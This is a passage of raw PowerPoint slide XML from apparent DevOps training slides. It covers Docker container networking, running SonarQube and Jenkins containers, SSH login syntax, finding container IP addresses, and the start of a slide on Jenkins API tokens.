          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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2" name="Shape 3512"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3513" name="Google Shape;3513;p5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14" name="Google Shape;3514;p5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School Database with 140 tables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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8" name="Shape 3518"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3519" name="Google Shape;3519;p568"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4863" l="4714" r="4623" t="4573"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5138078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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3" name="Shape 3523"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3524" name="Google Shape;3524;p569"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="13755" l="1213" r="3981" t="14565"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="358675" y="2629450"/>
            <a:ext cx="8426650" cy="2295950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3525" name="Google Shape;3525;p569"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1501348" y="1199733"/>
            <a:ext cx="1962321" cy="1832420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3526" name="Google Shape;3526;p569"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3890882" y="1199723"/>
            <a:ext cx="1456158" cy="1877625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3527" name="Google Shape;3527;p569"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5274875" y="2110450"/>
            <a:ext cx="24792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1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Jenkins</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3528" name="Google Shape;3528;p569"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6481766" y="248925"/>
            <a:ext cx="2441701" cy="696012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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p5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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How container can talk to each other ?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3534" name="Google Shape;3534;p570"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="932975" y="1017725"/>
            <a:ext cx="7278048" cy="3820975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3535" name="Google Shape;3535;p570"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706800" y="4486150"/>
            <a:ext cx="1545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rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3536" name="Google Shape;3536;p570"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5888988" y="4486150"/>
            <a:ext cx="1545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rPr>
              <a:t>Database</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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0" name="Shape 3540"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3541" name="Google Shape;3541;p571"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747350" y="413125"/>
            <a:ext cx="7242999" cy="4447275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3542" name="Google Shape;3542;p571"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241050" y="902650"/>
            <a:ext cx="3505800" cy="61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rPr>
              <a:t>SonarCube 9000-&gt;8080</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3543" name="Google Shape;3543;p571"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4099275" y="4193100"/>
            <a:ext cx="4155600" cy="61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rPr>
              <a:t>Jenkins 8080 -&gt; 9000</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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7" name="Shape 3547"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3548" name="Google Shape;3548;p572"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="10789" r="10221" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="64450" y="122750"/>
            <a:ext cx="8968149" cy="4611800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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2" name="Shape 3552"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3553" name="Google Shape;3553;p573"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1942475"/>
            <a:ext cx="8769300" cy="14577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sz="1750">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker run -d --name sonarqube -p 9000:9000 sonarqube:latest</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker run -d --name sonarqube -p 9000:9000 sonarqube:latest</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84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How to connect to a live server?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Google Shape;427;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300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>SSH, also known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> or Secure Socket Shell</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>We can connect to any remote server using SSH</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	ssh username@ip</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Ex.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	ssh root@38.242.236.173</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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7" name="Shape 3557"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3558" name="Google Shape;3558;p574"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="602900"/>
            <a:ext cx="8520600" cy="75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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>How to find the IP address of a specific Docker container?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3559" name="Google Shape;3559;p574"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1536600"/>
            <a:ext cx="8520600" cy="2070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991">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1991">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1391"/>
              <a:t>docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' CONTAINER_ID</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1391"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1991">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1991">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1491"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1391"/>
              <a:t>docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' 92c30bcff799</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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3" name="Shape 3563"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3564" name="Google Shape;3564;p575"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207625" y="1498750"/>
            <a:ext cx="8769300" cy="2673900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="693"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4090">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -u root --privileged -d </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="4090">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="4090">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-p 9090:9000 -p 8090:8080</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="4090">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="4090">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> jenkins/jenkins:latest</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4090">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3425">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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576"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="602900"/>
            <a:ext cx="8520600" cy="75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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>How to create API Token for Jenkins</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Crumb</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3570" name="Google Shape;3570;p576"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1536600"/>
            <a:ext cx="8520600" cy="2070300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
